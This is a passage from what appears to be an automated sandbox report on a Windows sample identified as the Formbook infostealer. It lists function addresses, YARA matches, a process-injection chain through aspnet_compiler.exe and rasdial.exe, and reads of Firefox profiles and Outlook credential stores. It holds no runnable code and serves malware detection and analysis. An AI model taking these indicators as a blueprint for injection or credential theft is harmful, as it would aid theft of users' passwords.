            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEEEDB6_2_04BEEEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEEE266_2_04BEEE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B30E596_2_04B30E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BAEFA06_2_04BAEFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3CFE06_2_04B3CFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B22FC86_2_04B22FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B50F306_2_04B50F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD2F306_2_04BD2F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B72F286_2_04B72F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA4F406_2_04BA4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B168B86_2_04B168B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B5E8F06_2_04B5E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3A8406_2_04B3A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B328406_2_04B32840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B329A06_2_04B329A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BFA9A66_2_04BFA9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B469626_2_04B46962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2EA806_2_04B2EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE6BD76_2_04BE6BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEAB406_2_04BEAB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF43F6_2_04BEF43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B214606_2_04B21460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCD5B06_2_04BCD5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF95C36_2_04BF95C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE75716_2_04BE7571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE16CC6_2_04BE16CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B756306_2_04B75630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF7B06_2_04BEF7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE70E96_2_04BE70E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEF0E06_2_04BEF0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDF0CC6_2_04BDF0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B370C06_2_04B370C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3B1B06_2_04B3B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B1F1726_2_04B1F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BFB16B6_2_04BFB16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B6516C6_2_04B6516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B352A06_2_04B352A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD12ED6_2_04BD12ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4B2C06_2_04B4B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B7739A6_2_04B7739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE132D6_2_04BE132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B1D34C6_2_04B1D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFCF26_2_04BEFCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA9C326_2_04BA9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4FDC06_2_04B4FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE7D736_2_04BE7D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE1D5A6_2_04BE1D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B33D406_2_04B33D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B39EB06_2_04B39EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFFB16_2_04BEFFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B31F926_2_04B31F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF3FD56_2_04AF3FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF3FD26_2_04AF3FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFF096_2_04BEFF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B338E06_2_04B338E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B9D8006_2_04B9D800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BC59106_2_04BC5910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B399506_2_04B39950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4B9506_2_04B4B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCDAAC6_2_04BCDAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B75AA06_2_04B75AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD1AA36_2_04BD1AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDDAC66_2_04BDDAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA3A6C6_2_04BA3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFA496_2_04BEFA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE7A466_2_04BE7A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4FB806_2_04B4FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BA5BF06_2_04BA5BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B6DBF96_2_04B6DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEFB766_2_04BEFB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C516E06_2_02C516E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C5DE6_2_02C4C5DE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C5E06_2_02C4C5E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4A8806_2_02C4A880
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C4C8006_2_02C4C800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C52F806_2_02C52F80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C52F7B6_2_02C52F7B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C54D906_2_02C54D90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C6B3F06_2_02C6B3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE6FC6_2_049EE6FC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049ED7686_2_049ED768
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE2466_2_049EE246
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049F533C6_2_049F533C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_049EE3636_2_049EE363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01AAB970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B3F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B07E54 appears 111 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01B2EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 01AF5130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B1B970 appears 280 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B77E54 appears 111 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B65130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04B9EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04BAF290 appears 105 times
            Source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.00000000030DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: x.exe, 00000000.00000000.1460579606.0000000000E0A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBXCJKS1233.exe6 vs x.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003185000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3316517414.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs x.exe
            Source: x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDEMONCODER.dll6 vs x.exe
            Source: x.exe, 00000000.00000002.3325127420.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs x.exe
            Source: firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameaspnet_compiler.exeT vs x.exe
            Source: x.exeBinary or memory string: OriginalFilenameBXCJKS1233.exe6 vs x.exe
            Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: x.exe, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.3212c4c.3.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.6450000.7.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: 0.2.x.exe.320afa8.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@11/8
            Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
            Source: C:\Users\user\Desktop\x.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\rasdial.exeFile created: C:\Users\user\AppData\Local\Temp\48663I1MJump to behavior
            Source: x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: x.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2069606587.0000000002F14000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2069545356.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3316528748.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3316528748.0000000002F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: x.exeReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: x.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: crUcuBAsmdG.exe, 00000005.00000002.3316271241.000000000054E000.00000002.00000001.01000000.00000007.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3316446902.000000000054E000.00000002.00000001.01000000.00000007.sdmp
